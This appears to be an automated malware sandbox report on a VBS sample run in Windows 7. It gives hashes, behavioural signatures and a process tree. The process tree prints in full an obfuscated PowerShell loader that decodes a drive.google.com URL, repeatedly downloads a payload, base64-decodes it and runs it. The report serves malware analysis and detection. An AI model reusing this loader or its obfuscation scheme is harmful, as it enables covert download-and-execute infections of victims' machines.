Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
08/06/2024, 07:18
Static task
static1
Behavioral task
behavioral1
Sample
83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d.vbs
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d.vbs
Resource
win10v2004-20240426-en
General
-
Target
83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d.vbs
-
Size
23KB
-
MD5
70e2991e57991e054e3473a4a9ec2a63
-
SHA1
1fe4276566a2c6e7db0ab8b85cdc7b4de9cf86c1
-
SHA256
83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d
-
SHA512
4f32f979ca9da2bcca42d727f08215f8b652b17d0e98d9e31fe6f5414789731bf9805d8f74990af917ea8c2b0b4f0fa9124101759df17d4c601d90670f76300d
-
SSDEEP
384:AcYk2uAnvIa7Yp000ekqThmLjp45PyUi6KkNXmNYXkfRf:Acx2p57qQqejpAPyUi6BNXxUft
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 3 2428 WScript.exe 7 464 powershell.exe 9 464 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 7 drive.google.com 6 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 464 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 464 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2428 wrote to memory of 464 2428 WScript.exe 28 PID 2428 wrote to memory of 464 2428 WScript.exe 28 PID 2428 wrote to memory of 464 2428 WScript.exe 28 PID 464 wrote to memory of 3064 464 powershell.exe 30 PID 464 wrote to memory of 3064 464 powershell.exe 30 PID 464 wrote to memory of 3064 464 powershell.exe 30
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2428 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Lgknoldet = 1;Function Berringsfladen190($Scratchcard){$Coil=$Scratchcard.Length-$Lgknoldet;$Kodfoderets='Substring';For( $gadebilledet=7;$gadebilledet -lt $Coil;$gadebilledet+=8){$Underargue+=$Scratchcard.$Kodfoderets.Invoke( $gadebilledet, $Lgknoldet);}$Underargue;}function Forlyder($Climata11){ & ($Spatten) ($Climata11);}$benzimidazole=Berringsfladen190 'At,osfrMOsteopeoWheelabzIconveriAnnicaslSquiffilUndisciaSyninge/ Militr5Autobah.R.educa0Nonrege Untast.(ArbejdsWKonsti i UnderlnapiolindThermogoSvensknwPhototusKelpi,g TwofersNNudni.kTEntreat aianis1 Ari.rs0Aminotr. Heglin0Ostraci;Reguler FenolerWBestredi OpremsnBredspe6Kandi,a4Ba depl;Salater TilflyxDirecto6Profite4Hyperfo; Curumi Cam,hacrbrndborvPluri.o:Smit et1Uvaerd 2Undergr1Omlbets.Snitvrk0Phenoge)rgsjler KonsumpG bi.dsee EthanocIlluderk Embo,co Re.ren/Sarcorh2B,edsaa0 Lemmed1Osmousa0Karskca0Teknolo1.nitsel0Fagvide1Enbran, DelthedFtro,ekliM,crospr.iggyslechalanafLeukemio UdpegexM ckere/Klockma1Justtre2l,njefa1Renerne.Unmecha0Sa mens ';$Tirve=Berringsfladen190 'ImpoverUTandlgesMyelineeslickinrReempha- AngepiA BerusegOpinioneEksisten infinitEskimol ';$hawklike=Berringsfladen190 'PaneulohPrinzhot lar.ertDaavildp Si.onisSam.and:Pict.an/Lystopf/outw.rkdFastholrBrut.oiiGestikuvPhocenie Deir r.Huchof,gdissei,oUnbarspo.icondygHalvkuglKlvedese Firepl.Afnati.c IntranoPruditym,pasmol/T.letaduruf sitcSvmmela?Discrete ArchpaxClinoc pTr adreoPatri.trStemmeptF rulem=Asplenidneighboo,dscripw pill anGallardlatomythotautoloaProx,mod Beeroc&D,llerii ChoribdForbrnd=Ostraco1FyrmestRStaminaRSplurgigReprovip Echino_Centr,fRBrnelrdz Rvrdig2Enceph,yClothotpSuitlikiOculonaJforbrydcStreget0Kyphosi0 ,radusN Pi,udipOceanisuFuturisZ T,ille4goo nesPChaperot gyrome-MateriaiAabenbaw Stnned9WellermvMinimumjDeserteKSektion2 Nonmet7Ganglio2grundta ';$Galliwasp=Berringsfladen190 ' Cumbro>Noncura ';$Spatten=Berringsfladen190 'cylindeiAntisipespionsax Lkkers ';$Cestos='Plsebar';$Uncastle = Berringsfladen190 'Skrukh.eVarebetc BoremahResorbeoRebuoya Dobbel%GuldaldaRebunchpUnglac pInstrumd Dent,iaNonsenst Slavd,a .akers% Uncarn\rovsingkKassea r Phyl.oe DammusdT larigiUnraptutCurvulatDonkeyke F somhnInterd,.LeatherN estlndoFunnellnudstykn Tanksta&indenri&populat Sk,vrigeFixearbcUnaturehDespotioRedisti SiegeabtHyleton ';Forlyder (Berringsfladen190 'Minxshi$kazaktagperspe l Yi,esao ellw nbMentoriaMaintailweather:GetatabBGrat,iteFalsknekAl,rinslSt,diecaResign gSluknineForeloulJoniseriJant.rsg HandedeFolkedor Ringvee comedis Angleb=Lsepult(Codesigc Forligm asturtdW.ndfla Coilyea/Wal,mancMilieur unmole$AndensiUOverfornStn,etsc GratisaForv klsArteriotDiphtholSeriocoeVampyr )Imm nas ');Forlyder (Berringsfladen190 'Ekst.at$t,kstmag BalloolTahinamoVan,alibAlgeaspaSusendel Bortad:,iatomeBgaspistuFun.ametValfar.y OutgoilMilitrnaEl.ktrimLiljekoi,ignalbnForbruseDisprop=gy,ospo$VelopdrhefterkraSeksogtwDirekt.kYaqo,aslKradsemiOrd einkSeptleveAscidio.Maaltids UnriskpCoveraglHusstaniEnergimtV,dired(Vlverhu$SprngkrGclo steaArno.islMurmurelGalosheiE fektiwSyskedaa SentimsBancosrpWeelvir)Hemolym ');$hawklike=$Butylamine[0];$Icterine= (Berringsfladen190 'Lysesta$ Unp,esgMisapprlLygtem,oCliquisb ParqueaSuppegrlWooersv:F.rbldtBti,guytrStreli nPallidieSpo,tedsReturneaUndisseaLiv,lanrBortled=Lich opN Celeb,eKalve,rw E,char-Pa,asubOHoverenbHerbagej.ilburseNonpondc U urdet Regara CeilingSCalibrayBreechlsLutianitMancheseCertifimOvulist.Homoc.nNS ldiereO.cultitRa,atou.D.ppelkWHeltindeOutpoisbTruistiCPa,tsuil R,bbiniDyr.naveAk,iespnSelektit');$Icterine+=$Beklageligeres[1];Forlyder ($Icterine);Forlyder (Berringsfladen190 ' Sundhe$ Besku BKampk,ar DopplenPoncedneSjlelivs Khahooa,orestia RigborrUnf.rio.WortworH Fritage MonograDemiss.dkonsumeeHelbredr deconcsDru.maa[Rodkno.$TeleskoTSpk.uggi Unn tirArtillevCoronateCurs,re] Rea,ti=Reperso$AsketerbMiljpaaeBeboelsnbamboozzHal.geniyerkednmPsammopiIndividd commena Lemlstz.ackeysoKildeskl ynenefe Opslmm ');$Vicontiels=Berringsfladen190 ' Cult v$PaginerB Eve,tyrUr,nomenAfgangseRibningsMu icataBesgactaCognat rGenicul.PorphyrDBilandeoargumenwMac.otonEfterralTollek osmlehovaOvervind OversiFTv vlraiTeledenlLeikafoeBitterb(titulad$Data.ash NuleneaEscandawKphjestkLeukstrl Daughti Ug.kork arbuckeRegnska,Galgenf$ AfdampP Uhllost ashpeeeRiddamprAepost oseismomsBrandfapIndsk.ieLedelinr Ejend.mTrffedeo aestrouGalmandswurleyp)Unfavou ';$Pterospermous=$Beklageligeres[0];Forlyder (Berringsfladen190 ' Flyv,r$Plu,aligKompenslA elopro ThreepbGa.tritaKontoralBlommes: Heli.pOOpskrtekOneirosknotkerieFrihederGaneftrn,arkanteAttaindsSpkhugg1Velaryd9Spisefr8Skybru =Amatrni(AnretteTPlisseee MglingsWeirdybtTheoris-kemikalPDeplaneaWackymutSsonerchSrtilfl Noshers$DagtjenPTvivllstAlcaic,eElessarrhaandhvoUdsk.ftsAfstivepUnderekeOpinionrUanseelmcalycoioDelfiunu NidifisVirksom)Pal,ada ');while (!$Okkernes198) {Forlyder (Berringsfladen190 'Roseola$T.lkebigBkke,belOpslideoFa vetabH lverea Trfsikl Becree: rigsrVTakkeklvExtillveTweedjar oliedriStk.ingsFidd eb=Slutdis$PrognostimmoralrFaint su Dis,oneAnissma ') ;Forlyder $Vicontiels;Forlyder (Berringsfladen190 ' Chond.SRet eadtAmm.nitaNondemarMaa,edstSteekin-MarmoreSnetstrmlR,jsebeeTelephoeUnpeacepStr,gsr Bryllup4fire,ar ');Forlyder (Berringsfladen190 'Fo.efal$SporinggMouthp lDdedansoNoexfrdb oughesa nstabil Dephlo: FormueO.panagekEpiz,oakHeweunpe agustircapitulnNonferoeVindikas Karrie1 cciput9Aa.esky8elletre=Adulter(Afsy inTRevivale Ciconis otaltetBumleno-DemagniPPleurocaCorriget.aandudhFrstesa ,linkfy$BrneforPBecommatPlatteneHungerlrSalgssto BortsasFoliernpSindelae ContemrPreheatmZollsuboDicho,duKod ficsproblem)Mink.ar ') ;Forlyder (Berringsfladen190 'Oliefar$Konc rngAnaly.el GlyoxyoRaf.inebDisq,isaZoransbl Arguit:KulturmPOrthoceuVerden,sWigletstEdsformeCaloricrKolonneuDe.elecm FortepmVemo.sse,nlagemnCha,emoe Dimiss=Phellog$NotochogSocketll,ndespooVammelhbBrakvanaByggemylStoette:Kolokv.eEjendomxNonulcecPebbleha undervvRaakremaCrookintSre ebaeDeskr,ps Unfatt+Avenuer+Steffis% Sku.ri$Joypop.BChokolauM.tvasktPriorizyLigaturlMagnascaEarscremStratociFrimeninS.hverteTwe vem.WanglincTruttacoweaseleu.udipednSe,vanttKa.eand ') ;$hawklike=$Butylamine[$Pusterummene];}$unentrapped=293328;$Zooplasty177=30076;Forlyder (Berringsfladen190 'Espe,an$ SelskagSt.gsejlTacheomoSemiquibActuariarecrushl fisker:RelishiAKompromgSemostogCircumfrG,noesee Ensilag,yppelsaB holdntMultisoeKejserptUdkaarisEt.onom Mor,inb=Outbrag TindingGGlycopeeLvs.ovetassurer-EineborC Mol,bdoOptrkkenunl.beltPyrenoieGrskepen Gyrinit F lker Uncolor$ Gluep PFo.dumstEgalitee EmissirScaremoodesertes UnderdpbeadroleComputeropercu mFugtigkoSjllanduColyticsPa idae ');Forlyder (Berringsfladen190 'Enaptse$CurranagPonyerslSlutbetoShoddywbCapsuliaNervulolGospel.: Bur.auR Dysleke O alizlHomotraeSaltiesgGymnasieAshramsrEidologi TuparanFotocelg Sorthae E.odfirScutchen Keelmae RenummsAngrebs Roekamp= Syg.jo Ahoycri[SuperesSUdtagetyLanier,sResprintAirbruseNavle,em Spor.e.Propo,tCEnamou oKonkurrnNeo.acivGladsakeSv,dekurUskoksntproinve]Refinis:Trowser:TaenkteFSerb rarEk pedeoNonellimMiswaytBSa menbaEntredesUnintereSaunder6Aminosy4 ReeshiSCarcinotdukkevorDiptycaiZind.senHelautogStrenge(Grovvar$ MethodAkassablgJackersg EventurShockineAnimistgTrini raBehov.ntPrereveeSlagt,ft LollypsBillige) Predic ');Forlyder (Berringsfladen190 ' Pa til$Dy frosgDesorbel RechaloFortrngbL idensaslavehal,astril:MutismpPSamhrigr ReciviaAfholdei holines C relleBeedigerInd,ere Forhold=Superw pehohom[.earlssSDeci.esybsseninsDiscerpt ybstegeModstanmE.ratum.RestrikT InexoreH,lgenex Sc,phatSpouseh. sningeEBnd llanLejdesacO,erridoFamlesfdDicingoi Thiochn GigologDunamsd] Sp,nta:Stor.ed:KorrigaAFa veglSMill onCRkkeflgI ,ricotIFl essa.ChromomG .ipskgeSorglstt PseudoSBal.egntDmning.rThistediGi.bettnKonsummgrekapit(Trumfst$HudsoniRToys,meeCheesemlRetorsie TransmgKunstmaeBlegso rMetazoai DublednAdvocatgPudderne KnackerFlerdobnWiener,eNiaisgusNo,syll) Bitsto ');Forlyder (Berringsfladen190 'Searcha$Teori.ngrattrailMavercao Unmustb StorfaaSonicatl Decolo: LancerACa,pfirsIltningk Stabile ImpenetSlalomeeUnoilgrn.apperl=un rook$DansetrPFlabederstabelvaRodeoeni ,rydefsretfrd eTaranchrDrif.sp.TopkicksAdhib.tuBe,ryprbGenindssAffronttPiperylrSort.meiindissonLagringgApathi,(No.comp$ThessaluMonostenVeerufyeLaasesmnBescurft Loathsr,uldbryaOperaerpdiskenspVenialieBocher.dTatt dd,Stillin$ReappliZGevreruoslutt dodefencepuretms.l.onsellaMenufilsCataclytTote.ply.erolig1Spidsmu7Mrkelig7Bouillo)Que.ule ');Forlyder $Asketen;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:464 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\kreditten.Non && echo t"3⤵PID:3064
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
MD536113f68a185488c2fbe2bfcf34bcfdc
SHA13e702a1bda44d41c8fad9ad56039be843c9a0706
SHA256fb796fb121a29aed4ca01f2cce8d3b59b70afd4978cbecd25625c2c45812e233
SHA51296bd9b00e3a3a6dc789bbb5414206e826b412596c39044b6c8e5d4a8624d49b75a991714858fa7c7d4bd5864cca82473eb311ef08d2fbddc33e1f7ff3f1ade45